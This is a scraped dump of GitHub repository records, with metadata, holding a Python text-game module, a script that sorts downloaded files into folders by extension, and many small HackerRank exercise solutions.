WorldMap\n\nclass Game:\n\n # States\n STATE_LOADED = \"loaded\"\n STATE_PLAYING = \"playing\"\n STATE_GAME_OVER = \"game over\"\n\n # Events\n EVENT_TICK = \"tick\"\n EVENT_STATE = \"state\"\n\n GAME_DATA_DIR = os.path.dirname(__file__) + \"\\\\data\\\\\"\n\n def __init__(self, name : str):\n\n self.name = name\n self.events = EventQueue()\n self._state = Game.STATE_LOADED\n self._tick_count = 0\n self.inventory = None\n self.resources = None\n self.creatables = None\n self.creations = None\n self.map = None\n\n\n @property\n def state(self):\n return self._state\n\n @state.setter\n def state(self, new_state):\n self._old_state = self.state\n self._state = new_state\n\n self.events.add_event(Event(self._state,\n \"Game state change from {0} to {1}\".format(self._old_state, self._state),\n Game.EVENT_STATE))\n\n def __str__(self):\n return self.name\n\n def start(self):\n\n self.state = Game.STATE_PLAYING\n\n self.inventory = Inventory()\n self.resources = ResourceFactory(Game.GAME_DATA_DIR + \"resources.csv\")\n self.resources.load()\n\n self.creatables = CreatableFactoryXML(Game.GAME_DATA_DIR + \"creatables.xml\")\n self.creatables.load()\n\n self.map = WorldMap(\"Kingdom 2\", 50, 50)\n self.map.initialise()\n\n self.creations = []\n\n def add_creation(self, new_creation : Creatable):\n self.creations.append(new_creation)\n\n def tick(self):\n self._tick_count += 1\n\n self.events.add_event(Event(Game.EVENT_TICK,\n \"Game ticked to {0}\".format(self._tick_count),\n Game.EVENT_TICK))\n\n for creation in self.creations:\n if self.inventory.is_creatable(creation):\n creation.tick()\n\n def do_game_over(self):\n\n self.state = Game.STATE_GAME_OVER\n\n def get_next_event(self):\n\n next_event = None\n if self.events.size() > 0:\n next_event = self.events.pop_event()\n\n return next_event" }, { "alpha_fraction": 0.5582748055458069, "alphanum_fraction": 0.5628786087036133, "avg_line_length": 26.151315689086914, "blob_id": "e9341d4c42a5bc2420e29c77935cd8c71c68db2f", "content_id": "025d414af718236da0a01ed95b0e3e61a2ad9d9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4127, "license_type": "no_license", "max_line_length": 105, "num_lines": 152, "path": "/kingdom2/view/text_view.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import logging\nimport sys\n\nimport colorama\n\nimport kingdom2.model as model\n\n\nclass View():\n\n def __init__(self):\n self.tick_count = 0\n\n def initialise(self):\n pass\n\n def tick(self):\n self.tick_count += 1\n\n def process_event(self, new_event: model.Event):\n logging.info(\"Default View Class event process:{0}\".format(new_event))\n\n def draw(self):\n pass\n\n\nclass TextView(View):\n\n def __init__(self, model: model.Game):\n super(TextView, self).__init__()\n\n self.model = model\n\n def draw(self):\n print(\"Text View of {0}\".format(self.model))\n\n inv_view = InventoryTextView(self.model.inventory)\n inv_view.draw()\n\n creations_view = CreationsTextView(self.model.creations)\n creations_view.draw()\n\n\nclass InventoryTextView(View):\n\n def __init__(self, model: model.Inventory):\n\n super(InventoryTextView, self).__init__()\n\n self.model = model\n\n def draw(self):\n if self.model is not None:\n self.model.print()\n else:\n print(\"No inventory to print!\")\n\n\nclass CreationsTextView(View):\n\n def __init__(self, model: list):\n\n super(CreationsTextView, self).__init__()\n\n self.model = model\n\n def draw(self):\n if self.model is not None:\n print(\"{0} creations:\".format(len(self.model)))\n for creation in self.model:\n print(str(creation))\n\n else:\n print(\"No creations to print!\")\n\n\nclass WorldMapTextView(View):\n COLOURS_DEFAULT = colorama.Fore.RESET + colorama.Back.RESET\n COLOURS_TITLE = colorama.Fore.BLACK + colorama.Back.YELLOW\n COLOURS_EMPTY_TILE = colorama.Fore.GREEN + colorama.Back.GREEN\n COLOURS_NON_EMPTY_TILE = colorama.Fore.BLACK + colorama.Back.GREEN\n\n def __init__(self, model: model.WorldMap):\n\n self.model = model\n\n if sys.stdout.isatty() is False:\n colorama.init(convert=False, strip=False)\n else:\n colorama.init(convert=True)\n\n def draw(self, rect: list = None):\n\n if rect is not None:\n ox, oy, width, height = rect\n else:\n ox = 0\n oy = 0\n width = self.model.width\n height = self.model.height\n\n print(WorldMapTextView.COLOURS_TITLE, end=\"\")\n print(\"+\" + \"-\" * width + \"+\" + WorldMapTextView.COLOURS_DEFAULT)\n title = \"{0:^\" + str(width) + \"}\"\n print(WorldMapTextView.COLOURS_TITLE, end=\"\")\n print(\"|\" + title.format(self.model.name) + \"|\" + WorldMapTextView.COLOURS_DEFAULT)\n print(WorldMapTextView.COLOURS_TITLE, end=\"\")\n print(\"+\" + \"-\" * width + \"+\" + WorldMapTextView.COLOURS_DEFAULT)\n\n for y in range(oy, oy + height):\n print(WorldMapTextView.COLOURS_TITLE + \"|\" + WorldMapTextView.COLOURS_DEFAULT, end=\"\")\n row = \"\"\n for x in range(ox, ox + width):\n c = self.model.get(x, y)\n if c is not None:\n row += WorldMapTextView.COLOURS_NON_EMPTY_TILE + c + WorldMapTextView.COLOURS_DEFAULT\n else:\n row += WorldMapTextView.COLOURS_EMPTY_TILE + \" \" + WorldMapTextView.COLOURS_DEFAULT\n\n print(row + WorldMapTextView.COLOURS_TITLE + \"|\" + WorldMapTextView.COLOURS_DEFAULT)\n\n print(WorldMapTextView.COLOURS_TITLE, end=\"\")\n print(\"+\" + \"-\" * width + \"+\" + WorldMapTextView.COLOURS_DEFAULT)\n\n\nclass WorldTopoModelTextView(View):\n\n def __init__(self, model: model.WorldMap):\n\n self.model = model\n\n def draw(self, rect: list = None):\n\n if rect is not None:\n ox, oy, width, height = rect\n else:\n ox = 0\n oy = 0\n width = self.model.width\n height = self.model.height\n\n for x in range(0, width):\n print(\",{0}\".format(x), end=\"\")\n print(\"\")\n\n for y in range(0, height):\n row = \"{0},\".format(y)\n for x in range(0, width):\n a = self.model.topo_model_pass2[x][y]\n row += \"{0:.4},\".format(a)\n\n print(row)\n" }, { "alpha_fraction": 0.8161764740943909, "alphanum_fraction": 0.8161764740943909, "avg_line_length": 26.200000762939453, "blob_id": "485a22dfb4f4cbf3d1353a1d423be66cd1273312", "content_id": "23dd49d4cae6bc8490ce96a9ec4cab3387a64223", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 136, "license_type": "no_license", "max_line_length": 29, "num_lines": 5, "path": "/kingdom2/model/__init__.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "from .model import Game\nfrom .model import Inventory\nfrom .model import WorldMap\nfrom .utils import EventQueue\nfrom .utils import Event\n" } ]
9
JanKPeters/SortDownloads
https://github.com/JanKPeters/SortDownloads
53500fd7a5018e751c0758aa2f1d1daf4569dc2e
89caffcf96f2574c656afbbef091fa09352fa7a6
797a1bad3c5772258291aa883a0dfd21e3ca4f0b
refs/heads/master
2020-09-25T05:25:00.412848
2019-12-04T20:54:24
2019-12-04T20:54:24
225,927,356
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8376068472862244, "alphanum_fraction": 0.8376068472862244, "avg_line_length": 57.5, "blob_id": "d364662cb2af361e9d96108e10923b9ba23cb272", "content_id": "a9fb0a27237754a86c869136b2d2b3fdad42d723", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 117, "license_type": "no_license", "max_line_length": 100, "num_lines": 2, "path": "/README.md", "repo_name": "JanKPeters/SortDownloads", "src_encoding": "UTF-8", "text": "# SortDownloads\nA small script that periodically sorts the downloaded files into folders according to the file types\n" }, { "alpha_fraction": 0.599526047706604, "alphanum_fraction": 0.6026856303215027, "avg_line_length": 22.0181827545166, "blob_id": "95aeaa9821e665e2f664bae6a1c32825138bf529", "content_id": "2767b9b7c5adca0f217fd825fcca9c41a229f372", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1266, "license_type": "no_license", "max_line_length": 61, "num_lines": 55, "path": "/downloads.py", "repo_name": "JanKPeters/SortDownloads", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport time\nimport schedule\nimport importlib.util\n\n\npackage_recs = 'schedule'\n\nspec = importlib.util.find_spec(package_recs)\nif spec is None:\n print(package_recs +\" is not installed\")\n exit\n\ndownload = os.path.join(os.path.expanduser('~'), 'Downloads')\n\ndef check_folder(download, filetype):\n _path = os.path.join(download, filetype)\n if not os.path.exists(_path):\n os.makedirs(_path)\n\n\ndef move_files(download, filetype):\n _path = os.path.join(download, filetype)\n _files = os.listdir(download)\n for f in _files:\n if f.endswith('.' + filetype):\n f_path_ori = os.path.join(download, f)\n f_path_tar = os.path.join(_path, f)\n os.rename(f_path_ori, f_path_tar)\n\n\ndef check_for_downloads():\n filetypes = []\n\n for f in os.listdir(download):\n if f.startswith('.'):\n pass\n elif '.' in f:\n if f.split('.')[1] in filetypes:\n pass\n else:\n filetypes.append(f.split('.')[1])\n\n\n for filetype in filetypes:\n check_folder(download, filetype)\n move_files(download, filetype)\n\nschedule.every().hour.do(check_for_downloads)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n" } ]
2
kiranmaipuli/2PL-CONCURRENY-CONTROL--WAIT-DIE
https://github.com/kiranmaipuli/2PL-CONCURRENY-CONTROL--WAIT-DIE
7b3b15c0c78662843d5aa4b50289611fbdf5aa0a
a69834ef3e6a0a792e3a6d42a43e1c5c46d2a391
a707985a60b6ced42ab1b7d6d19eb3f70723ff09
refs/heads/main
2023-02-01T21:18:40.844933
2020-12-22T07:24:20
2020-12-22T07:24:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5347042083740234, "alphanum_fraction": 0.5371538996696472, "avg_line_length": 43.1606559753418, "blob_id": "eb789371fd6f5961c8bb08c7a892f229b5b0b27a", "content_id": "03d5e866a252414cf72a1d5b88cb75e7ea4f0fa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13471, "license_type": "no_license", "max_line_length": 145, "num_lines": 305, "path": "/2PLConcurrencyControl_wait_die.py", "repo_name": "kiranmaipuli/2PL-CONCURRENY-CONTROL--WAIT-DIE", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport sys\n\ntimeStampCounter = 0\ncolumnNames = [\"TID\", \"timeStamp\", \"state\",\"blockedBy\",\"blockedOperations\"]\ntransactionTable = pd.DataFrame(columns = columnNames) #creating the schema for transaction table\ntransactionTable.set_index('TID',inplace = True) #using transaction_id as the index of the transaction table\ncolumnNames = [\"dataItem\", \"lockMode\", \"TIDList\",\"blockedTIDS\"]\nlockTable = pd.DataFrame(columns = columnNames) #creating the schema for lock table\nlockTable.set_index('dataItem',inplace = True) #using dataItem as the index of the lock table\n\n#input operation processing\ndef inputOperations(inputLine):\n print(\"*******************BEGIN*******************\")\n# print(\"\\n\")\n print(\"operation : \"+inputLine)\n inputLine = inputLine.replace(\" \",\"\") \n operation = inputLine[0]\n transactionNo = inputLine[1]\n if len(inputLine) > 3:\n DataItem = inputLine[3]\n global timeStampCounter\n if operation == 'b':\n timeStampCounter += 1\n begin(transactionNo)\n if operation == 'r':\n read(transactionNo,DataItem) \n if operation == 'w':\n write(transactionNo,DataItem)\n if operation == 'e':\n end(inputLine[1])\n\n#begin operation \ndef begin(i):\n transaction = 'T'+i\n print(\"Begin transaction : \"+transaction)\n transactionTable.loc[transaction] = [timeStampCounter, 'Active',[],[]]\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n\n#read operation\ndef read(i,X):\n transaction = 'T'+i\n if transactionTable.loc[transaction]['state'] == 'Active':\n readLock(i,X)\n elif transactionTable.loc[transaction]['state'] == 'Blocked':\n inputLine = 'r'+i+'('+X+');'\n transactionTable.loc[transaction]['blockedOperations'].append(inputLine)\n print(\"operation is appended to the BlockedOperations of the transaction \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n elif transactionTable.loc[transaction]['state'] == 'Aborted':\n print(transaction+' already aborted')\n\ndef readLock(i,X):\n transaction = 'T'+i\n if X not in lockTable.index:\n #inserting the data item into the lock table\n lockTable.loc[X] = ['R', [transaction],[]]\n print(\"Item \"+X+\" read locked by \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n else:\n if lockTable.loc[X]['lockMode'] == 'R':\n #sharing of read lock with other transactions\n if transaction not in lockTable.loc[X]['TIDList']:\n print(\"inside this 3\")\n lockTable.loc[X]['TIDList'].append(transaction)\n print(\"Item \"+X+\" read locked by \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n else:\n print(\"read lock already exists on \"+X+\"by \"+transaction)\n else:\n # if there is a write lock on the data item by the current transaction\n#changes made here \n if (len(lockTable.loc[X]['TIDList']) == 0):\n lockTable.loc[X]['lockMode'] = 'R'\n lockTable.loc[X]['TIDList'].append(transaction)\n print(\"Item \"+X+\" read locked by \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n \n elif lockTable.loc[X]['TIDList'][0] == transaction :\n # downgrading of the write lock of the current transaction\n lockTable.loc[X]['lockMode'] = 'R'\n print(\"lock mode is downgraded for the data item \"+X)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n else:\n # read-write conflict\n deadLock(i,X,'r')\n \n#write operation\ndef write(i,X):\n transaction = 'T'+i\n if transactionTable.loc[transaction]['state'] == 'Active':\n writeLock(i,X)\n elif transactionTable.loc[transaction]['state'] == 'Blocked':\n inputLine = 'w'+i+'('+X+');'\n transactionTable.loc[transaction]['blockedOperations'].append(inputLine)\n print(\"operation is appended to the BlockedOperations of the transaction \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n elif transactionTable.loc[transaction]['state'] == 'Aborted':\n print(transaction+' already aborted')\n \n\ndef writeLock(i,X):\n transaction = 'T'+i\n # if the data item does not exist in the lock table\n if X not in lockTable.index:\n #insert the data item into the table with write lock\n lockTable.loc[X] = ['W', [transaction],[]]\n print(\"Item \"+X+\" write locked by \"+transaction)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n# print(X+\" write locked by \"+transaction+\": Lock table record for \"+X+\" is created with mode W (\"+transaction+\" holds lock)\")\n else:\n # upgrading of read lock of the current transaction on the data item\n if (lockTable.loc[X]['lockMode'] == 'R') and (len(lockTable.loc[X]['TIDList']) == 1) and (lockTable.loc[X]['TIDList'][0] == transaction):\n lockTable.loc[X]['lockMode'] = 'W'\n print(\"lock mode is upgraded for the data item \"+X)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n else:\n #read-write conflict\n deadLock(i,X,'w')\n \ndef deadLock(i,X,mode):\n print(\"deadlock is encountered\")\n transaction = 'T'+i\n for j in lockTable.loc[X]['TIDList']:\n if transactionTable.loc[transaction]['timeStamp'] > transactionTable.loc[j]['timeStamp']:\n abort(i)\n elif transactionTable.loc[transaction]['timeStamp'] < transactionTable.loc[j]['timeStamp']:\n if transaction not in lockTable.loc[X]['blockedTIDS']:\n lockTable.loc[X]['blockedTIDS'].append(transaction)\n transactionTable.loc[transaction]['state'] = 'Blocked'\n inputLine = mode+i+'('+X+');'\n transactionTable.loc[transaction]['blockedOperations'].append(inputLine) \n if j not in transactionTable.loc[transaction]['blockedBy']:\n transactionTable.loc[transaction]['blockedBy'].append(j)\n unblock()\n if X in lockTable.index:\n if len(lockTable.loc[X]['blockedTIDS']) == 0 and len(lockTable.loc[X]['TIDList']) == 1 and lockTable.loc[X]['TIDList'][0] == transaction:\n if mode == 'r':\n lockTable.loc[X]['lockMode'] = 'R'\n else:\n lockTable.loc[X]['lockMode'] = 'W'\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n \n# aborting transaction Ti\ndef abort(i):\n #updating transaction table\n transaction = 'T'+i\n transactionTable.loc[transaction]['state'] = 'Aborted'\n transactionTable.loc[transaction]['blockedBy'] = []\n transactionTable.loc[transaction]['blockedOperations'] = []\n print(transaction+\" is aborted\")\n unLock(i) \n\ndef unLock(i):\n transaction = 'T'+i\n for j in transactionTable.index:\n if transaction in transactionTable.loc[j]['blockedBy']:\n transactionTable.loc[j]['blockedBy'].remove(transaction)\n\n # unlocking the data items locked by Ti \n for dataValue in lockTable.index:\n # removing Ti from TIDList\n temp = []\n if transaction in lockTable.loc[dataValue]['TIDList']:\n temp.append(transaction)\n for transactions in temp: \n lockTable.loc[dataValue]['TIDList'].remove(transactions)\n\n # removing Ti from blockedTIDS\n temp = []\n if transaction in lockTable.loc[dataValue]['blockedTIDS']:\n temp.append(transaction)\n for transaction in temp:\n lockTable.loc[dataValue]['blockedTIDS'].remove(transaction) \n\n # removing data items from the lock table that are completely free \n for dataValue in lockTable.index:\n if len(lockTable.loc[dataValue]['TIDList']) == 0 and len(lockTable.loc[dataValue]['blockedTIDS']) == 0: \n lockTable.drop([dataValue],axis=0, inplace=True)\n \n\n\ndef unblock():\n for dataValue in lockTable.index:\n blockList = lockTable.loc[dataValue]['blockedTIDS'][:]\n tidList = lockTable.loc[dataValue]['TIDList']\n # unblock the blocked transactions\n\n if len(blockList) != 0:\n #if (len(tidList) == 0) or (len(tidList) == 1 and (tidList[0] == blockList[0])):\n \n for transactions in blockList:\n if transactionTable.loc[transactions]['state'] == 'Blocked':\n # if the transaction is not blocked by any one \n if len(transactionTable.loc[transactions]['blockedBy']) == 0:\n #changes made here \n if len(lockTable.loc[dataValue]['blockedTIDS']) == 1 and (len(lockTable.loc[dataValue]['TIDList']) == 0):\n lockTable.drop([dataValue],axis=0, inplace=True)\n else: \n lockTable.loc[dataValue]['blockedTIDS'].remove(transactions)\n transactionTable.loc[transactions]['state'] = 'Active'\n # execute the blocked operations\n size = len(transactionTable.loc[transactions]['blockedOperations'])\n for k in range(0,size):\n if transactionTable.loc[transactions]['state'] == 'Active':\n if len(transactionTable.loc[transactions]['blockedOperations']) >= 1:\n a = transactionTable.loc[transactions]['blockedOperations'][0]\n del transactionTable.loc[transactions]['blockedOperations'][0]\n inputOperations(a)\n \n#end operation\ndef end(i):\n transaction = 'T'+i\n if transactionTable.loc[transaction]['state'] == \"Active\":\n transactionTable.loc[transaction]['state'] = 'Committed'\n transactionTable.loc[transaction]['blockedOperations'] = []\n print(\"transaction \"+transaction+\" is committed\")\n unLock(i)\n unblock()\n print(\"\\n\") \n print(\"operation e\"+i)\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n elif transactionTable.loc[transaction]['state'] == 'Blocked':\n inputLine = 'e'+i+';'\n transactionTable.loc[transaction]['blockedOperations'].append(inputLine)\n print(\"input operation is added to the BlockedOperations list of transaction\")\n print(\"\\n\")\n print(\" Transaction Table \")\n print(transactionTable)\n print(\"\\n\")\n print(\" Lock Table \")\n print(lockTable)\n elif transactionTable.loc[transaction]['state'] == 'Aborted':\n print(transaction+' is already aborted') \n\n#input file is the name of the input file. File name is passed as a command line argument while executing the input\n#inputFile = sys.argv[1] \n\n#reading input from the file\ninputFile = sys.argv[1] \n\n#reading input from the file\nwith open(inputFile) as openfileobject:\n lines = openfileobject.readlines()\n for line in lines:\n if line != '\\n':\n inputLine = line.rstrip() \n inputOperations(inputLine) \n print(\"*******************END*******************\")\n print(\"\\n\")\n\n\n" } ]
1
shaan2348/hacker_rank
https://github.com/shaan2348/hacker_rank
09562b352df545e2365c0c654ee19d5d3da952a1
4d1ae8231cf056385f2ee802725983469ab71bb9
3f71bfcb784689ddaf0cbd8cc7e595e3655283f6
refs/heads/master
2020-03-25T11:39:33.115976
2018-09-25T08:49:21
2018-09-25T08:49:21
143,741,851
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7138047218322754, "alphanum_fraction": 0.7138047218322754, "avg_line_length": 32.11111068725586, "blob_id": "3f20a0d4af6f64d76cd4c4f9fe0a838f6a4b4693", "content_id": "2e730b9b7e7d532a926517884055f87013be8c89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 68, "num_lines": 9, "path": "/itertools_product.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to print the cartesian product of two sets\n# using product function from itertools module\n# \"*\" infront of any thing in print unpacks the list or tuple or set\nfrom itertools import product\n\na = [int(x) for x in input().split()]\nb = [int(x) for x in input().split()]\n\nprint(*product(a,b))" }, { "alpha_fraction": 0.5152838230133057, "alphanum_fraction": 0.5414847135543823, "avg_line_length": 29.53333282470703, "blob_id": "340c29af4d9a587723758b59b62edf6176647e2d", "content_id": "58257e64382ce9fff1b170e8b39dcc2cfaddba5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 458, "license_type": "no_license", "max_line_length": 104, "num_lines": 15, "path": "/lists.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "n = int(input()) # this is for the number of inputs to be taken\nl = []\n\nfor _ in range(n):\n cmd = input(\"Please Enter Your Command here:\")\n s = cmd.split() #splitting the command ex: if cmd is insert 1 2, so it becomes ['insert', '1' ,'2']\n\n cmd2 = s[0]\n arg = s[1:]\n\n if cmd2 != \"print\":\n cmd2 += \"(\" + \",\".join(arg) + \")\" # here we rejoin the command and it becomes insert(1 2)\n eval(\"l.\" + cmd2)\n else:\n print(l)\n" }, { "alpha_fraction": 0.6255319118499756, "alphanum_fraction": 0.6340425610542297, "avg_line_length": 20.454545974731445, "blob_id": "7b777904f4d62258da0caefe32218a3ddd16dc99", "content_id": "cbea3e89d98d415fda9b74d467f4e12b227be828", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 235, "license_type": "no_license", "max_line_length": 52, "num_lines": 11, "path": "/iterators_iterables.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# for problem statement refer to the hackerrank site\nfrom itertools import *\nn = int(input())\nl = input().split()\nk = int(input())\ncount = 0\na = list(combinations(l,k))\nfor i in a:\n if 'a' in i:\n count+= 1\nprint(count/len(a))" }, { "alpha_fraction": 0.5722891688346863, "alphanum_fraction": 0.5722891688346863, "avg_line_length": 21.200000762939453, "blob_id": "abfa46eedae919426437d00e971d2f187654b98e", "content_id": "b2e45d7a08df4034439ef1de4b5f96c610eff27a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 332, "license_type": "no_license", "max_line_length": 62, "num_lines": 15, "path": "/capitalize.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def capitalize(string):\n a = []\n s = string.split()\n for i in s:\n a.append(i.capitalize())\n return (\" \".join(a))\n\nif __name__ == '__main__':\n string = input()\n capitalized_string = capitalize(string)\n print(capitalized_string)\n\n\n# one liner:\n# return (' '.join(i.capitalize() for i in string.split(' ')))" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.6284584999084473, "avg_line_length": 17.740739822387695, "blob_id": "a9c5a15a4374363a10f665fd12435e731ce9ca1a", "content_id": "cee32644c6be5347dd9be49d66b23533d1d63426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 506, "license_type": "no_license", "max_line_length": 124, "num_lines": 27, "path": "/percentage.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "n = int(input())\n\nmarksheet = {}\n\nfor _ in range(n):\n details = input().split()\n name = details[0]\n marks = details[1:]\n marksheet[name] = marks\n\n #marksheet[name] = [marks1, marks2, marks3] this is also a way to allocate multiple values to a single key in dictionary\n\n#print(marksheet)\n\nx = input()\n\nl = marksheet[x]\na = len(l)\nsum = 0\navg = 0\n\nfor i in range(a):\n sum = sum + float(l[i])\n\navg = sum/a\n\nprint(f'{avg:.2f}') #applies only for py 3.6 or above otherwise use .format method\n" }, { "alpha_fraction": 0.4861878454685211, "alphanum_fraction": 0.4917127192020416, "avg_line_length": 19.22222137451172, "blob_id": "ce30cedcbf37c98c58ce803dd183e61cadbc6a6f", "content_id": "f0c9fdbe95012ed78c887ccc6988c865ed509c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/set_mutations.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "N = int(input())\nA = set(input().split())\n\nM = int(input())\nfor i in range(M):\n x = input().split()\n y = input().split()\n eval('A.' + x[0] + '(y)' )\nprint(sum(map(int, A)))" }, { "alpha_fraction": 0.5882353186607361, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 29.600000381469727, "blob_id": "c24ca0c4c6959180bedf41dd268a5ed2c89f2a7c", "content_id": "1082be7a68b10b9f727f497638e825c31af6e4a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 48, "num_lines": 5, "path": "/math_power_modpower.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to print pow(a,b) and\n# pow(a,b,m) it calculates (a**b) % m\na,b,m = int(input()), int(input()), int(input())\nprint(pow(a,b))\nprint(pow(a,b,m))\n" }, { "alpha_fraction": 0.6877076625823975, "alphanum_fraction": 0.7043189406394958, "avg_line_length": 25.173913955688477, "blob_id": "1b0d37f4b14dd0d37538161a87a67cddf6836bb9", "content_id": "f57d1701e34be39325d95f0748ba7730cbf3d323", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 60, "num_lines": 23, "path": "/set_union.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we take input for n number of students who have subscribed\n# for english newspaper and take input for their roll nos\nn = int(input())\ns1 = set(map(int, input().split()))\n\n# we take input for b number of students who have subscribed\n# for french newspaper and take input for their roll nos\nb = int(input())\ns2 = set(map(int, input().split()))\n\n# we take n and b's union and print its length\na = s1.union(s2)\nprint(len(a))\n\n# we take n and b's intersection and print its length\nb = s1.intersection(s2)\nprint(len(b))\n\nc = s1.difference(s2)\nprint(len(c))\n\nd = s1.symmetric_difference(s2)\nprint(len(d))\n" }, { "alpha_fraction": 0.6282051205635071, "alphanum_fraction": 0.6452991366386414, "avg_line_length": 18.58333396911621, "blob_id": "cf330ecb472192de38c38556f347a034091ebac2", "content_id": "3d0b4ce781b193ac160b9c5c022ed0ea10ee39b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 234, "license_type": "no_license", "max_line_length": 53, "num_lines": 12, "path": "/set_add.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# problem is to add elements from given list or input\n# to a set and get the length of resultant set\n\nN = int(input())\nset1 = set()\n#s = input().split()\n\nfor i in range(N):\n s = input()\n set1.add(s)\n#print(set1)\nprint(len(set1))" }, { "alpha_fraction": 0.6691842675209045, "alphanum_fraction": 0.6858006119728088, "avg_line_length": 23.55555534362793, "blob_id": "e99a4136d01bc728c689e0a9351d019e5636bd58", "content_id": "92297ce552ed2a7b769cd758734b9eb6f627e479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 662, "license_type": "no_license", "max_line_length": 74, "num_lines": 27, "path": "/beautiful_binary_string.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# a binary string is not beautiful if '010' is present as its substring\n# ques asks to return minimum number of changes from 0 to 1 and vice versa\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the beautifulBinaryString function below.\ndef beautifulBinaryString(b):\n # here what we are doing is print the number of occurances of '010'\n # because that will be the number of changes we will have to do\n return b.count('010')\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n b = input()\n\n result = beautifulBinaryString(b)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()" }, { "alpha_fraction": 0.7297762632369995, "alphanum_fraction": 0.7297762632369995, "avg_line_length": 40.57143020629883, "blob_id": "252238c3741e1de6dc43d2ef58f796b29a5f3cf1", "content_id": "c1ea322085d7fa09e8ae2f0d72edd2778c5bc87d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 83, "num_lines": 14, "path": "/athlete_sort.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we are asked to sort the list of given athletes based on Kth attribute\n# we take input of number of athletes and attribute for each of them\nN, M = map(int, input().split())\n#input of details of athletes\nrows = [input() for _ in range(N)]\nprint(rows)\n# attribute on which we have to sort the details\nK = int(input())\n\n# here we use sorted method to sort the lists\n# here in sorted we are passing our list of athlete and\n# key is for passing the particular attribute on which we will be sorting our lists\nfor row in sorted(rows, key=lambda row: int(row.split()[K])):\n print(row)" }, { "alpha_fraction": 0.5426008701324463, "alphanum_fraction": 0.560538113117218, "avg_line_length": 19.363636016845703, "blob_id": "09747f1a8f72b4985bb9545b0af34aa7a4ddd36d", "content_id": "912240966ac298403ebc78bff2b0536c7799c018", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 45, "num_lines": 11, "path": "/sets_no_idea.py", "repo_name": 